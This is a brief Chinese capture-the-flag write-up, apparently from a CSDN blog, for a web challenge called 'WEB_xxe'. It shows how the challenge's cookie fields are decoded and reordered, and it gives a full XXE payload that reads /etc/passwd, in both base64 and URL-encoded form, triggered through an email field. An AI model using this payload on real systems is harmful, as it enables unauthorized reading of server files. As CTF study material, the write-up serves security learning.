-
小学期,第三场-下午:WEB_xxe
hint:
1.cookie
2.进行了base64编码
抓包查看 Cookie,跟平常的不同,有 version, bracket, bracket2
bracket2 进行了 URL 加密,解回来
base64 解码后,可以看到三者的顺序
顺序应该是 bracket+version+bracket2
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
将写好的语句编码
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg==
URL 编码
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgQU5ZIFs8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg%3D%3D
截取三段放在对应位置
&xxe;
URL 编码
%26xxe%3B
需要调用 xxe,找能调用的点
在 email 中可以成功调用
重复以上方法找 flag
-
相关阅读:
4.云原生-KubeSphere中安装GitLab(三)
1.1 数据库系统概述
解读 | 自动驾驶系统中的多视点三维目标检测网络
寒亭5.8万亩盐碱稻 国稻种芯·中国水稻节:山东潍坊插秧期
新手教程,蛋糕小程序的搭建流程一网打尽
OpenHarmony实战开发-如何实现tabContent内容可以在tabBar上显示并且tabBar可以响应滑动事件的功能。
在windows操作系统上安装MariaDB
vue的生命周期
面对密集型的I/O任务处理,python该如何提高执行效率
计算机毕业设计之java+springboot基于vue的网上图书商城系统
- 原文地址:https://blog.csdn.net/qq_62260856/article/details/125524919